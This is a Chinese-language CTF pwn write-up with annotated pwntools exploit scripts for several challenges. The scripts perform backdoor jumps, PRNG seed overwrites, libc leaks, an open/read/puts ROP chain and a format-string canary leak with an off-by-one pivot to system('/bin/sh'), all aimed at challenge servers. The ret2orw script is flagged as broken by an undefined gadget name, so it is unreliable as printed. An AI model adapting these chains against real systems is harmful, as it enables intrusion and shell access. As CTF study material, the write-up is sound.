girlfriend

第六个数组输入的时候,输入的值将决定循环的顺序,再填入后门

# Writeup script for the "girlfriend" challenge (see the note above the
# listing): a fixed sequence of scripted inputs to the challenge service.
# Every address is specific to the challenge binary; the commented-out
# process('./pwn') line is the local alternative to the remote target.
from pwn import *
# 'debug' echoes every byte sent and received -- the only way to see whether
# each unprompted sendline below lands on the intended prompt.
context(log_level='debug')
#p=process('./pwn')
p=remote('27.25.151.12',25622)

# Fixed code addresses, so the target binary presumably has no PIE -- confirm
# with checksec. `ret` is defined but never used in this script.
ret=0x40101a
# Per the writeup, the address of the "backdoor" (后门) function.
gift=0x401216
# Five copies of the gift address, then the literal "admin" and two NUL bytes
# (47 bytes). How the target interprets this is binary-specific; the writeup
# only says the input decides the loop order -- TODO confirm.
payload=p64(gift)*5+b'admin'+b'\x00'*2
p.sendline(payload)


# Numeric inputs sent without waiting for their prompts.
p.sendline(b'100')
p.sendline(b'100')
p.sendline(b'100')
p.sendline(b'100')
p.sendline(b'300')
#gdb.attach(p)
#pause()
p.sendline(b'5')
p.sendlineafter(b'please input your 7 girlfriend birthday',b'1')
# 4198942 == 0x40121e == gift + 8, given in decimal because the service parses
# a number here; presumably a point inside the same backdoor function --
# verify against the disassembly.
p.sendlineafter(b'please input your 8 girlfriend birthday',b'4198942')

p.interactive()

ez_game

伪随机数通过溢出覆盖seed,再按照题目给的进行输入就好

# Writeup script for "ez_game": the service's rounds are driven by a
# predictable PRNG, so after forcing the seed the client reproduces the same
# sequence locally with the challenge's own libc (see the note above).
from pwn import *
from ctypes import *
context(log_level='debug')
p=remote('27.25.151.12',39274)

# 0x190 bytes of filler followed by the 8-byte value 1; per the writeup this
# overflow overwrites the seed with 1. The 0x190 offset is binary-specific.
payload=b'a'*0x190+p64(1)
p.sendline(payload)
# Load the challenge's libc through ctypes and seed its rand() identically.
# The name `elf` is misleading: this is a ctypes CDLL handle, not a pwntools
# ELF. The sequence only matches if ./libc.so.6 is the build the service uses.
elf = cdll.LoadLibrary('./libc.so.6')
elf.srand(1)

# str rather than bytes here and in sendline below: pwntools encodes it, but
# the other scripts on this page use b'' literals.
p.recvuntil('Round')
# 20001 answers, each rand() % 7 + 1, sent back-to-back with no read between.
for i in range(20001):
    a=elf.rand() % 7 + 1
    p.sendline(str(a))


p.interactive()

ret2orw

题目开了沙箱,只能orw

这题本来想在本地写shellcode,在栈迁移到bss段执行,理论上应该可以,但是一直没有写出来

看了网上的wp,发现可以直接找open函数、read函数和puts完成orw,下面的脚本是在网上找到的,自己加了点注释

# Writeup script for "ret2orw" (see the note above: the binary runs under a
# sandbox, so the chain is open/read/write instead of a shell). Stage 1 leaks
# a libc address through puts@plt; stage 2 runs an open/read/puts ROP chain
# built from libc. Taken from an online writeup per the text above; the
# original Chinese comments are translated here.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#context.terminal = ['wt.exe', 'wsl']
libc = ELF("./libc.so.6")

#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
e = ELF("./pwn")
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
# Gadgets and symbols in the challenge binary (fixed addresses, so presumably
# no PIE -- confirm with checksec).
pop_rdi = 0x4012ce
ret = 0x40101a          # defined but not used below
main = 0x4012a1
bss = 0x4040a0
flag = bss + 0x100      # buffer the flag contents are read into

# Leftover: prints shellcraft's open() assembly but never uses it (the text
# above says a shellcode approach was tried and abandoned).
print(shellcraft.open("./flag"))
# Runs locally; unlike the other scripts on this page there is no remote().
io = process("./pwn")



# Stage 1: 32 bytes of buffer + 8 bytes saved rbp, then puts(puts@got) and a
# return to main so the overflow can be triggered a second time.
get_libc = b"a"*32 + b"b"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendafter(b"oh,what's this?\n", get_libc)
# Reads up to and including the 0x7f high byte and zero-pads to 8 bytes. Any
# bytes the program prints before the address end up in the value too; the
# 小蓝鲨stack script below discards them with a [-6:] slice.
puts_addr = u64(io.recvuntil(b'\x7f').ljust(8,b'\x00'))

libc_base = puts_addr - libc.sym["puts"]
print(hex(libc_base))
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
# libc-relative gadget offsets, specific to ./libc.so.6.
pop_rsi = libc_base + 0x2be51
# NOTE(review): defined as `pop_rdxi_r12` but referenced as `pop_rdx_r12`
# twice below, so the script as printed stops with a NameError while building
# the second payload.
pop_rdxi_r12 = libc_base + 0x11f2e7

# Attaches a debugger and blocks until resumed; remove for an unattended run.
gdb.attach(io)
pause()

payload = b"c"*32 + b"d"*8

# read(?, bss, ?): copy the path string into .bss. rdi and rdx are not set
# by this fragment, so it relies on whatever they hold when the chain starts
# -- TODO confirm. (The original comment said "write ./flag to bss+0x100",
# but the destination passed here is `bss`; bss+0x100 is the `flag` buffer
# used further down.)
payload += p64(pop_rsi) + p64(bss) + p64(read_addr)

# open(bss, 0, 0)
payload += p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) +p64(pop_rdx_r12) + p64(0) + p64(0)+ p64(open_addr)

# read(3, flag, 0x100): assumes the opened file receives descriptor 3.
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag) + p64(pop_rdx_r12) + p64(0x100) + p64(0)+ p64(read_addr)

# puts(flag): print the flag contents.
payload += p64(pop_rdi) + p64(flag) + p64(puts_addr)

io.send(payload)

# Consumed by the first read() in the chain: the path that open() receives.
io.send(b"./flag")
io.interactive()

小蓝鲨stack

ret2libc注意printf要栈对齐

# Writeup script for "小蓝鲨stack": ret2libc in two stages. Stage 1 leaks
# printf's address through printf@plt and returns to main; stage 2 calls
# system("/bin/sh"). See the note above about stack alignment for printf.
from pwn import *
# Unused: the LibcSearcher lookup is commented out below (the libc is known).
from LibcSearcher import *
context(log_level='debug')


#p = process('./pwn')
p=remote('27.25.151.12',32833)
elf = ELF('./pwn')
libc=ELF('./libc-2.31.so')
pop_rdi=0x401293
# Misnamed: these hold printf's PLT/GOT entries, not puts'.
puts_plt=elf.plt['printf']
puts_got=elf.got['printf']
ret=0x40101a
# Distance from the overflowed buffer to the saved rbp; binary-specific.
offset=32

main_addr=elf.sym['main']

payload=b'a'*offset+b'a'*8

payload+=p64(pop_rdi)
payload+=p64(puts_got)
# The extra `ret` keeps the stack 16-byte aligned before the printf call,
# which the text above notes printf requires.
payload+=p64(ret)
payload+=p64(puts_plt)
payload+=p64(ret)
payload+=p64(main_addr)
#gdb.attach(p)
#pause()
p.sendline(payload)

#leak_addr= u64(p.recvuntil(b"\x7f").ljust(8, b"\x00"))
# Keeps only the last 6 bytes up to the 0x7f high byte, so anything printed
# before the address is discarded.
leak_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

# (hex)(x) is just hex(x) with redundant parentheses.
log.success("leak_addr:{}".format((hex)(leak_addr)))

#libc = LibcSearcher("puts",leak_addr)

libc_base=leak_addr-libc.sym['printf']
system_addr=libc_base+libc.sym['system']
bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))


log.success("libc_base:{}".format((hex)(libc_base)))
log.success("system_addr:{}".format((hex)(system_addr)))
log.success("bin_sh_addr:{}".format((hex)(bin_sh_addr)))


# Stage 2: the same overflow, a ret for alignment, then system("/bin/sh").
payload2=b'a'*offset+b'a'*8
payload2+=p64(ret)+p64(pop_rdi)
payload2+=p64(bin_sh_addr)+p64(system_addr)

p.sendline(payload2)

p.interactive()

0verf10w

格式化字符串把canary,libc,还有栈(后面利用off-by-one栈迁移)的地址泄露出来,刚好看到后面vuln有个off-by-one,通过溢出rbp后一个字节导致函数到我们写完数据的地方重启main函数

不知道为什么我本地打这个一直打不通,不过也就是最后一步,system函数被变成其他的,好在远程打得通,不然真怀疑人生了

# Writeup script for "0verf10w" (see the note above): a format-string read
# leaks four stack words (canary, a libc pointer, a stack pointer and main's
# address), an off-by-one on the saved rbp's low byte redirects execution to
# the data already written, and a final ret2libc payload calls system.
from pwn import *
context(log_level='debug')
#p=process('./pwn')
p=remote('27.25.151.12',30861)

libc = ELF("./libc.so.6")
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.sendlineafter(b' that?',b'aaaaaaaa')
# Four positional %p reads. Which stack slots 29, 11, 15 and 13 hold is
# binary-specific; the variable names below record the author's mapping.
payload=b'aaaaaaaa%29$p%11$p%15$p%13$p'

def debug():
    """Attach gdb to the live process and block until resumed."""
    gdb.attach(p)
    pause()


#debug()
p.sendline(payload)
p.recvuntil(b'0x')
# Only 14 hex digits are read and two '0's appended on the right: the author
# assumes the canary's low byte is 0x00 (the usual glibc layout), so this
# rebuilds the full value and leaves the printed "00" for the next recvuntil
# to skip.
canary=int(p.recv(14).ljust(16,b'0'),16)
p.recvuntil(b'0x')

# libc base from the leaked libc pointer; 0x29d90 is that pointer's offset in
# this ./libc.so.6.
libc_base=int(p.recv(12),16)-0x29d90
p.recvuntil(b'0x')

# Stack reference, 0x60 below the leaked slot.
stack=int(p.recv(12),16)-0x60

p.recvuntil(b'0x')
main=int(p.recv(12),16)

system_addr = libc_base + libc.sym["system"]
binsh_addr = libc_base + next(libc.search(b"/bin/sh"))
# Gadget offsets within ./libc.so.6.
pop_rdi = libc_base + 0x2a3e5
ret = libc_base+0x29139


# Low byte of the stack address; written over the saved rbp's low byte below.
last_byte = (stack & 0xFF)

print(hex(canary))
print(hex(main))
print(hex(libc_base))

# 33 bytes: four 8-byte words then one byte. The trailing byte is the
# off-by-one that changes the saved rbp's low byte (see the text above);
# send(), not sendline(), so no newline follows it.
payload=p64(canary)*2+p64(main)+p64(canary)+p8(last_byte)
#debug()
p.send(payload)


# ret2libc: 0xc bytes of filler, the canary twice, then pop rdi; "/bin/sh";
# ret (alignment); system.
payload2=b'a'*(0x14-0x8)+p64(canary)*2+p64(pop_rdi) + p64(binsh_addr)+p64(ret)+p64(system_addr)
p.sendline(payload2)

# Remaining prompts answered before the redirected return takes effect --
# TODO confirm against the binary.
p.sendafter(b'a gift!',b'a')
p.sendafter(b'again?????',b'a')

p.interactive()

syscall(没出)

给了三次执行syscall的机会,四个参数可以任意调整,不知道为什么利用shmget+shmat就把libc泄露出来了

orange

没学到io怎么打。。。。,回头学完再来